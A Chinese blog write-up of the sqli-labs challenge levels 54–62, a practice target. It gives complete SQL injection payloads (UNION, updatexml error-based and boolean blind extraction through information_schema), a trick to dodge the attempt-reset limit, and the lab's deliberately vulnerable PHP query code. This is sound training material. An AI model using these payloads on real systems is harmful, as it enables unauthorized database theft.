sqli-labs-challenges

最新推荐文章于 2023-01-19 15:36:12 发布
最新推荐文章于 2023-01-19 15:36:12 发布
阅读量1.2k 收藏
点赞数
分类专栏: web 文章标签: 数据库 web安全 database
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Ga4ra/article/details/123048494
版权

文章目录


sqli labs靶场 page 4是挑战性的,每个题都提交一定的请求次数后,就会重置数据库,所以没法用盲注。

获取到数据库里的secret key并提交,则通关。

在刷page4 challenge的时候,重点练习了一下闭合符号的判断,之前几个page的判断不太严谨。

一. Union

54. GET-10 queries

提示输入ID参数。判断下闭合以及有无注入:

?id=1 and 1=1		-- 正常回显
?id=1 and 1=2		-- 正常回显

?id=1' and '1'='1		-- 正常回显
?id=1' and '1'='2		-- 不正常回显,闭合成功并执行

?id=1" and "1"="1		-- 正常回显
?id=1" and "1"="2		-- 正常回显
?id=1) and (1=1			-- 正常回显
?id=1) and (1=2			-- 正常回显
            
-- 不要忘了判断下有没有括号
?id=1') and ('1'='1		-- 不正常回显
?id=1') and ('1'='2		-- 不正常回显

应该是单引号闭合,接下来用union判断字段数,同时占位。注意id填写-1,使第一个select查询失败,从而显示我们的union select:

?id=-1' union select 1,2,3 -- x
-- Your Login name:2
-- Your Password:3

开始获取数据:

-- 库名
?id=-1' union select 1,2,database() -- x
-- Your Password:challenges

下面注意,因为提交次数有限,就不要逐个查询表名了,直接用group_concat拼接所有表名回显,当然如果有超长表名,就可能被截断。

-- 所有表名
?id=-1' union select 1,2,group_concat(concat(0x7e, table_name, 0x7e)) from information_schema.tables where table_schema=database() -- x
-- Your Password:~4riqztvj44~

-- 所有列名
-- 4riqztvj44经过ascii编码处理
?id=-1' union select 1,2,group_concat(concat(0x7e, column_name, 0x7e)) from information_schema.columns where table_name=0x347269717A74766A3434 -- x
-- Your Password:~id~,~sessid~,~secret_VIIH~,~tryy~

-- 获取secret key
?id=-1' union select 1,2,group_concat(concat(0x7e, secret_VIIH, 0x7e)) from 4riqztvj44  -- x
-- Your Password:~QC4UaKD4wp0JAw6U9mFScZNF~

看下源码:



<?php
//including the Mysql connect parameters.
include '../sql-connections/sql-connect-1.php';
include '../sql-connections/functions.php';			// next_tryy()等数据库函数在这里
error_reporting(0);
$pag = $_SERVER['PHP_SELF']; //generating page address to piggy back after redirects...  /sqli-labs/Less-54/index.php
$characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'; //characterset for generating random data
$times= 10;			// 超过这些次数则重置数据库
$table = table_name();
$col = column_name(1);     // session id column name
$col1 = column_name(2);   //secret key column name


// Submitting the final answer
if(!isset($_POST['answer_key']))		// 没提交key
{
	// resetting the challenge and repopulating the table .
	if(isset($_POST['reset']))			// 提到次数达到上限,重置数据库
	{
		setcookie('challenge', ' ', time() - 3600000);		// cookie失效
		echo "<font size=4>You have reset the Challenge</font><br>\n";
		echo "Redirecting you to main challenge page..........\n";
		header( "refresh:4;url=../sql-connections/setup-db-challenge.php?id=$pag" );
		//echo "cookie expired";
			
	}
	else
	{
		// 提到次数没达到上限
		// Checking the cookie on the page and populate the table with random value.
		if(isset($_COOKIE['challenge']))
		{
			$sessid=$_COOKIE['challenge'];
			//echo "Cookie value: ".$sessid;
		}
		else
		{
			// cookie过期 重置
			$expire = time()+60*60*24*30;
			$hash = data($table,$col);
			setcookie("challenge", $hash, $expire);
			
		}
	

	
		// take the variables
		if(isset($_GET['id']))
		{
			$id=$_GET['id'];
	
			
			//update the counter in database
			// 尝试次数+1
			next_tryy();
			
			//Display attempts on screen.
			$tryyy = view_attempts();
			echo "You have made : ". $tryyy ." of $times attempts";
			echo "<br><br><br>\n";
		
			
			//Reset the Database if you exceed allowed attempts.
			if($tryyy >= ($times+1))
			{
				setcookie('challenge', ' ', time() - 3600000);	// cookie失效
				echo "<font size=4>You have exceeded maximum allowed attempts, Hence Challenge Has Been Reset </font><br>\n";
				echo "Redirecting you to challenge page..........\n";
				header( "refresh:3;url=../sql-connections/setup-db-challenge.php?id=$pag" );  // 重置后再返回id页面
				echo "<br>\n";
			}	
		
		
		
			// Querry DB to get the correct output
			$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
			$result=mysql_query($sql);
			$row = mysql_fetch_array($result);

			if($row)
			{
				echo '<font color= "#00FFFF">';	
				echo 'Your Login name:'. $row['username'];
				echo "<br>";
				echo 'Your Password:' .$row['password'];
				echo "</font>";
			}
			else 
			{
				echo '<font color= "#FFFF00">';
//				print_r(mysql_error());
				echo "</font>";  
			}
		}
		else
		{
			// 提示输入id参数
		}
	
	}
	

?>
    
//...

<?php

}

else
{
    // 提交key
	$key = addslashes($_POST['key']);
	$key = mysql_real_escape_string($key);
	//echo $key;
	//Query table to verify your result
	$sql="SELECT 1 FROM $table WHERE $col1= '$key'";
	//echo "$sql";
	$result=mysql_query($sql)or die("error in submittion of Key Solution".mysql_error());
	 
	$row = mysql_fetch_array($result);
	
	if($row)
	{
		// congratulations
		header( "refresh:4;url=../sql-connections/setup-db-challenge.php?id=$pag" );	
	}
	else 
	{
        // error
	}	


}

?>

而重置数据库,则是在/sql-connections/setup-db-challenge.php里实现:

// ...
//Creating new database for challenges
	$sql="CREATE database $dbname1 CHARACTER SET `gbk` ";
	if (mysql_query($sql))
		{echo "[*]...................Creating New database successfully";echo "<br><br>\n";}
	else 
		{echo "[*]...................Error creating database: " . mysql_error();echo "<br><br>\n";}

include '../sql-connections/functions.php';		// 这里生成随机表名$table

// Creating table 
$sql="CREATE TABLE IF NOT EXISTS $dbname1.$table
		(
                id INT(2) UNSIGNED NOT NULL DEFAULT 1,
		sessid CHAR(32) PRIMARY KEY NOT NULL,
		$secret_key CHAR(32) NOT NULL,
		tryy INT(11) UNSIGNED NOT NULL DEFAULT 0 
		)";
// ...

55. GET-14 queries

判断注入及闭合:

?id=1 and 1=1		-- 正常回显
?id=1 and 1=2		-- 不正常回显

?id=1' and '1'='1		-- 不正常回显
?id=1' and '1'='2		-- 不正常回显

?id=1" and "1"="1		-- 不正常回显
?id=1" and "1"="2		-- 不正常回显
?id=1) and (1=1			-- 正常回显
?id=1) and (1=2			-- 不正常回显,闭合成功

闭合应该是个括号。

其余步骤和54一样:

?id=-1) union select 1,2,group_concat(concat(0x7e, table_name, 0x7e)) from information_schema.tables where table_schema=database() -- x
-- Your Password:~t33dm31iqe~

?id=-1) union select 1,2,group_concat(concat(0x7e, column_name, 0x7e)) from information_schema.columns where table_name='t33dm31iqe' -- x
-- Your Password:~id~,~sessid~,~secret_4JTA~,~tryy~

?id=-1) union select 1,2,group_concat(concat(0x7e, secret_4JTA, 0x7e)) from t33dm31iqe  -- x
-- Your Password:~yteA3HquGp8wWsfZsnQDodJS~

56.

判断闭合:

?id=1 and 1=1		-- 正常回显
?id=1 and 1=2		-- 正常回显

?id=1' and '1'='1		-- 正常回显
?id=1' and '1'='2		-- 不正常回显,说明闭合成功并执行

?id=1" and "1"="1		-- 正常回显
?id=1" and "1"="2		-- 正常回显
?id=1) and (1=1			-- 正常回显
?id=1) and (1=2			-- 正常回显
            
-- 不要忘了判断有没有括号  以及几个括号
?id=1') and ('1'='1		-- 正常回显
?id=1') and ('1'='2		-- 不正常回显,说明闭合成功并执行

闭合应该是单引号加括号。

其余步骤和54一样。

57.

判断闭合:

?id=1 and 1=1		-- 正常回显
?id=1 and 1=2		-- 正常回显

?id=1' and '1'='1		-- 正常回显
?id=1' and '1'='2		-- 正常回显

?id=1" and "1"="1		-- 正常回显
?id=1" and "1"="2		-- 不正常回显,说明闭合成功并执行
            
-- 不要忘了判断有没有括号  以及几个括号
?id=1") and ("1"="1		-- 不正常回显
?id=1") and ("1"="2		-- 不正常回显

闭合只有一个双引号。

二. Double Query

58. GET-5 queries

判断闭合:

?id=1 and 1=1		-- 正常回显
?id=1 and 1=2		-- 正常回显

?id=1' and '1'='1		-- 正常回显
?id=1' and '1'='2		-- 不正常回显,说明闭合成功并执行

?id=1" and "1"="1		-- 正常回显
?id=1" and "1"="2		--  正常回显
            
-- 不要忘了判断有没有括号  以及几个括号
?id=1") and ("1"="1		-- 正常回显
?id=1") and ("1"="2		-- 正常回显

闭合是单引号。

用union select判断字段数,同时占位:

?id=-1' union select 1,2,3 -- x
-- Your Login name : Angelina
-- Your Password : dhakkan

能正常回显,但是占位失败了,没有显示1,2,3.

提交?id=1',页面有报错,所以可以使用updatexml。

?id=1' and updatexml(1,concat(0x7e,database(), 0x7e), 1) -- x
-- XPATH syntax error: '~challenges~'

成功,继续构造payload:

-- 所有表名
?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'), 0x7e), 1) -- x
-- XPATH syntax error: '~me4y56z4ta~'

-- 所有列名
?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='me4y56z4ta'), 0x7e), 1) -- x
-- XPATH syntax error: '~id,sessid,secret_QAWY,tryy~'

-- 获取key
?id=1' and updatexml(1,concat(0x7e,(select group_concat(secret_QAWY) from me4y56z4ta), 0x7e), 1) -- x
-- XPATH syntax error: '~WEgQxOdcDS2Ue5z8P7tsV3qA~'

看下源码:

// Querry DB to get the correct output
$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if($row)
{
    // 不能用union select的原因在这里
    $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
    $pass = array_reverse($unames);
    echo 'Your Login name : '. $unames[$row['id']];
    echo 'Your Password : ' .$pass[$row['id']];
}
else 
{
    print_r(mysql_error());
}

59.

判断闭合:

?id=1 and 1=1		-- 正常回显
?id=1 and 1=2		-- 不正常回显,说明闭合成功并执行

?id=1' and '1'='1		-- SQL syntax error: '' and '1'='1 LIMIT 0,1' at line 1
?id=1' and '1'='2		-- SQL syntax error: '' and '1'='1 LIMIT 0,1' at line 1

?id=1" and "1"="1		-- SQL syntax error: '" and "1"="1 LIMIT 0,1'
?id=1" and "1"="2		-- SQL syntax error: '" and "1"="2 LIMIT 0,1' 
            
-- 不要忘了判断有没有括号  以及几个括号
?id=1) and (1=1		-- SQL syntax error: ') and (1=1 LIMIT 0,1'
?id=1) and (1=2		-- SQL syntax error: ') and (1=1 LIMIT 0,2'

没有闭合符号,把58题的单引号去掉就行了。

60.

判断闭合:

?id=1 and 1=1		-- 正常回显
?id=1 and 1=2		-- 正常回显

?id=1' and '1'='1		-- 正常回显
?id=1' and '1'='2		-- 正常回显

?id=1" and "1"="1		-- 正常回显
?id=1" and "1"="2		-- 不正常回显
            
-- 不要忘了判断有没有括号  以及几个括号
?id=1") and ("1"="1		-- 正常回显
?id=1") and ("1"="2		-- 不正常回显

闭合应该是双引号加括号,同样改下58题的payload就行了。

61.!!!

判断闭合:

?id=1 and 1=1		-- 正常回显
?id=1 and 1=2		-- 正常回显

?id=1' and '1'='1		-- 正常回显
?id=1' and '1'='2		-- 不正常回显

?id=1" and "1"="1		-- 正常回显
?id=1" and "1"="2		-- 正常回显
            
-- 不要忘了判断有没有括号
?id=1') and ('1'='1		-- 正常回显
?id=1') and ('1'='2		-- 不正常回显

闭合为单引号加括号

构建payload:

?id=1') and updatexml(1,concat(0x7e,database(), 0x7e), 1) -- x
-- syntax error

报了语法错误,懵了,,,

看了下源码,原来是闭合是单引号加两个括号:

?id=1')) and (('1'='1		-- 正常回显
?id=1')) and (('1'='2		-- 不正常回显

再加个)就行了:

?id=1')) and updatexml(1,concat(0x7e,database(), 0x7e), 1) -- x
-- XPATH syntax error: '~challenges~'

后面的payload不仅要改闭合,还要把库名、表名等字符串改成ascii编码形式,或者双引号(因为闭合已经有单引号了):

三. Blind

62. GET-130 queries

判断闭合:

?id=1 and 1=1		-- 正常回显
?id=1 and 1=2		-- 正常回显

?id=1' and '1'='1		-- 正常回显
?id=1' and '1'='2		-- 不正常回显

-- 不要忘了判断有没有括号,以及几个括号
?id=1') and ('1'='1		-- 正常回显
?id=1') and ('1'='2		-- 不正常回显
?id=1')) and (('1'='1	-- 不正常回显
?id=1')) and (('1'='2	-- 不正常回显

闭合应该是单引号加1个括号。

union select判断字段数并占位:

?id=-1') union select 1,2,3 -- x
-- Your Login name : Angelina
-- Your Password : dhakkan

占位失败,估计还是和58题源码一样,用数据库里的id作为局部name数组的下标然后回显。

再试试updatexml:

?id=1') and updatexml(1,concat(0x7e,database(), 0x7e), 1) -- x

没有回显,所以应该是把print_r(mysql_error())注释调了。

开始盲注:

?id=1') and length(database())=9 -- x
?id=1') and length(database())=10 -- x  正常回显

有效。

130次请求上限,并不是真的要手工一次次地尝试,用bp抓包爆破的话,只要不勾选follow redirection选项,不访问setup-db-challenge.php,即使次数达到130也不会重置数据库了。

爆破库名,表名这一部分,因为有次数限制,所以要用二分法(一般实战中都要用二分法,效率高):

?id=1') and length((select table_name from information_schema.tables where table_schema=database() limit 0,1)) = 9  -- table name length
?id=1') and length((select table_name from information_schema.tables where table_schema=database() limit 0,1)) = 10  -- table name length

表名长度也是10。

-- bp抓包
?id=1') and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)) = 0x62 -- lowercase?

用bp intruder模块:

  • substr(xxx, 1,1),第2个参数为position 1,字典1-10;
  • 0x62为position 2,字典为ascii表的所有可见字符。

看了下数据库的表名,手写了下字典,是可行的,但爆破key太耗时了没折腾,,,,

请添加图片描述

至于63-65,仍然只是换了下闭合符号。

CodeStarr
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL-Challenge通关教程
玄道的网安博客
05-09 665
首先是安装,修改配置文件,创建challenge数据库,打开http://www.test.com/setup-db.php即可安装 直接开始吧 SQL-1 传进id=1可以看到执行了sql语句,我们看看源码 源码中屏蔽了错误,所有这是盲注了 可以看到执行了AND SLEEP(5)语句就会发现沉睡了 SQL-2 这次和上一关差不多的,就是用单引号包裹住了id 我们用加多几个单引号即可 SQL-3 这次换了括号,相对应加上即可 SQL-4 这题既然开
sqli-labs Basic Challenges Less1-10
LJFYYJ的博客
07-13 266
SQL注入 写在前面的总结: Less 1-9的难度的主要提升顺序: 1.正确具体信息可见,错误具体信息可见: Less1-4,使用union select将所需字段通过正确具体信息显示; 注意判断是整型还是字符型、单引号或双引号、是否有括号。 2.正确具体信息不可见,错误具体信息可见: Less 5-6,Double injection类型,使用报错注入。 3.只有正确、错误信息,没有详细信息:...
sqli-labs闯关笔记(Challenges
末初的CSDN博客
05-13 537
sqli-labs项目地址:https://github.com/Audi-1/sqli-labs 文章目录Less-54Less-55Less-56Less-57Less-58Less-59Less-60Less-61Less-62Less-63Less-64Less-65 正文 Less-54 注入方法和第一关没啥区别,但是做了一个sql查询次数,在表中tryy每查询一次会+1,达到10次重置表名和字段名 但是10次好像没啥影响吧,把过程写一下: http://127.0.0.1/sqli.
SQLI-LABS(Basic Challenges)
volcano的博客
12-04 730
sql注入 SQL注入是比较常见的网络攻击方式之一,一般分为数字型和字符型,攻击者在HTTP请求中输入含有恶意构造且语法合法的SQL语句,只要应用程序中没有做严格的处理(例如校验或预拼接),那么就会出现SQL注入漏洞危险。 Sqli-labs Sqli-labs-master是一个用来学习sql注入的闯关游戏。 之前看的教程中,普通题目大多数都是用union联合查询注入的,我用的是基于updatexml()函数的报错注入,这里也是参考大佬的博客慢慢学习。 函数解释:   UPDATEXML (XML_doc
sqli-labs靶场challenges第54-75关(超详细)
weixin_51566481的博客
08-18 2124
sqlilabs,sql注入
phpstudy+靶场sqli-labs-master下载
最新发布
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
安装sqli-labs
10-22
安装sqli-labs靶场环境 本文旨在指导读者安装sqli-labs靶场环境,用于学习和练习SQL注入漏洞。sqli-labs是一款功能强大且易于使用的靶场环境,包含多种最新的漏洞,可以满足不同级别的用户需求。 为什么要使用本地...
sqli-labs.rar
12-22
sqli-labs是一个专门设计用于学习和练习SQL注入技术的平台,特别适合初学者了解和提升SQL注入防御技能。 首先,要搭建sqli-labs,你需要准备以下工具: 1. PHPstudy:一个集成的Web服务器环境,包括Apache、Nginx、...
SQL注入学习——sqli-labs闯关(Basic Challenges)
未完成的歌~的博客
07-28 2747
今天开始学习 SQL 注入的相关知识,通过 sqli-labs 靶场来练习。靶场地址SQL注入(SQL Injection)是一种常见的 Web 安全漏洞,攻击者通过构造SQL语句与后台数据库进行交互,达到获取或修改一些敏感数据,或者利用潜在的数据库漏洞进行攻击的目的。何为盲注?盲注就是在 sql 注入过程中,sql 语句执行后,查询的数据不能回显到前端页面上。此时,我们需要利用一些特殊的方法来得到数据,这个过程称之为盲注。盲注主要分为三类:基于布尔的 SQL 盲注基于时间的 SQL 盲注。........
SQL注入-SQLlabs(Basic Challenges)1-10
GALi_233的博客
03-20 330
SQLlabs sqllabs是一个安全小白学习sql注入最好的练习靶场。在此记录下学习的过程,有错误的话, 欢迎大家指正。 sqllabs分四个阶段分别是 Basic-Challenges Advanced-Injections Stacked Injections Challenge Basic-Challenges Less-1: GET-Error based- Single quotes -String 根据提示用id作为参数 http://192.168.43.85/sqllab/Le
SQLi_Labs-5.Challenges
自强不息
01-19 128
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
mysql createdatabase_SQL 创建数据库 CREATE DATABASE
weixin_39954487的博客
01-27 1647
SQL 创建数据库 CREATE DATABASE在本教程中,您将学习如何使用SQL在关系数据库管理系统(如MySQLSQL Server等)中创建数据库。创建数据库在对数据进行任何处理之前,我们必须首先创建一个数据库。我们假设您已经拥有一个MySQLSQL Server可供使用,并且拥有所有必需的特权,如果没有,请查看入门指南。SQL CREATE DATABASE语句用于创建数据库。语法创...
手动创建数据库步骤
数据库
03-08 1216
创建数据库前的规划: 1.预估表和索引所占空间大小 2.计划数据库文件在操作系统的分布(如:将REDO日志文件放在单独的磁盘或者磁带上) 3.选择一个全局数据库名(设置DB_NAME和DB_DOMAIN) 4.服务器参数文件配置 5.选择数据库字符集 6.选择支持的时区(缺省时区文件是timezlrg_11.dat) 7.选择标准的数据块大小 8.考虑是否手动指定在线重做日志的块大...
mysql:sql create database新建utf8mb4 数据库
热门推荐
ShellDawn的博客
05-04 6万+
create database sina default character set utf8mb4 collate utf8mb4_unicode_ci;
sqli-labs 46-65
遇事不决冲冲冲
04-10 1116
第46关 知识点 asc:指定列按升序排列 select * from users order by 1 asc; desc:指定列按降序排列selec * from users order by 1 desc Right(数据,数字):从数据的右边开始前数字个字母为select Right(database(),1); Left(数据,数字):从数据的左边开始前数字个字母为select Left(database(),1) lines terminated by xxx:最后写好的句子会以xxx结尾 方法
sqli-labs通关汇总-page4
m0_37638874的博客
06-27 487
  less-38(GET型、单引号、mysqli_multi_query()堆叠注入)less-38标题:GET - challenge - Union -10 queries allowed - Variation1这里开始有意思了,仅允许10个查询第一步:测闭合 无回显值第二步:测闭合 有回显值,说明是单引号闭合第三步:测查询语句字段数这个就很迷了,你运气不好你就测不到,这时候还是用去测吧 第四步:测查询语句字段数 得出查询语句字段数为第五步:测前端回显位置,顺带着回显数据库 得到数据库名为第
MySQL注入实战指南——Sqli-labs教程解析
"MySQL注入天书——Sqli-labs使用手册" 这篇文档是关于MySQL注入技术的详细指南,特别关注于使用Sqli-labs进行实战练习。作者Lcamry在2016年编写了这份手册,旨在帮助读者理解和掌握SQL注入攻击与防御的相关知识。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值